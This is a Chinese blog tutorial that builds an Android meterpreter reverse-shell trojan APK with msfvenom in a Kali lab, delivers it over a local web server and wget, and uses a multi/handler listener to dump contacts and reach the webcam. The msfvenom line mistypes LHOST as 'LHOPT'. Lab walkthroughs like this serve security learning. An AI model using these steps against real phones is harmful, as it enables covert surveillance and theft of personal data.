kali系统入侵安卓系统

DiX研究院

随着互联网技术的不断发展,诸如信息泄露、数据篡改等这类网络犯罪和攻击日益增多,全球网络安全事件频发,威胁程度不断上升,黑客和防御者之间的攻防对抗成为网络空间战场的主要形式。网络管理者需要进一步的保护和限制对内部网络数据的操作,以防止如陷门、病毒、非法浏览、拒绝服务、网络资源非法占有等无法控制的风险,并加以防范网络黑客的进攻。

 Step 1 

kali设置桥接模式

打开kali系统虚拟机,在【网络适配器】上设置成【桥接模式】,点击【确定】。

 Step 2 

测试虚拟机系统

 2.1 测试kali系统网络

在kali系统的命令窗口,使用【IP address】与【ping】命令,得到kali系统的IP地址,以及与android虚拟机的通信情况。

2.2 测试android系统网络

进入android系统的【终端模拟器】,使用【IP address】与【ping】命令,得到android系统的IP地址,以及与kali系统虚拟机的通信情况。

 Step 3

kali系统入侵准备

3.1 kali系统生成木马软件

输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOPT=【kali的IP地址】 LPORT=4444 R > test.apk
(因为木马植入android系统,需要kali系统的IP地址进行及时通讯,所以内置kali系统的IP地址)
3.2 kali系统搭建网站

在kali命令窗口输入【python3 -m http.server 80】生成一个植入木马的网站。

3.3 在android系统打开木马网址

在android系统上,找到谷歌浏览器,打开之后,在搜索栏输入【kali系统IP地址】,发现需要下载的【test.apk】,前往终端适配器进行下载。

 

 Step 4

下载木马软件

4.1 打开android系统终端模拟器

4.2 查看当前目录文件夹

在终端模拟器输入【ls】命令,可以查看到当前文件内有【sdcard】文件。

4.3 命令下载木马软件

输入【cd sdcard】,可以进入sdcard文件内部,再次输入【wget】命令,【wget http://10.9.44.187/test.apk】,执行下载命令。进入文件可看到test.apk文件。

 Step 5 

设置监听

5.1 命令

msfconsole 

use exploit/multi/handler 【后门模块】

set payload android/meterpreter/reverse_tcp 【攻击载荷】

set LHOST 10.9.44.187【kali系统的IP地址】

set LPORT 4444【端口】

show options

run【运行】

 Step 6 

启动木马程序

6.1 启动安装木马程序

回到android系统,双击木马系统,点击【继续】—【安装】—【取消】保护,完成安装。

6.2 运行木马

运行木马,同时新建一个电话联系人,名为【xx】,联系方式【110】

6.3 测试监听

回到kali系统,此时已经完成对android系统的监听,并收到android系统回弹的连接,输入【dump_contacts】命令,获取联系人列表。

6.4 查看监听内容

返回kali系统的文件管理器主界面,进入【home】目录,寻找到【contacts_dump.txt】文件,双击打开,查看内容是否与android系统输入的联系人信息一致。

内容与android输入的内容一致。

通过webcam_list命令,查看可打开的摄像头,可以看到1:后摄像头和2:前摄像头。

运行webcam_stream -i 1,打开后摄像头(模拟器环境无真实摄像头,固出现error),入侵摄像头完成。

随着国家将网络安全的发展作为战略目标,也随着以后工作经验的积累,以及接触的渗透测试越来越多,自己的渗透测试技术也会越来越丰富,对于渗透测试的研究也势必会更加深入,最终也希望自己能为国家的网络安全事业贡献出一份自己的力量。

原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/90348.html

(0)
guozi的头像guozi
上一篇 2024年6月5日 下午3:53
下一篇 2024年6月5日 下午4:06

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注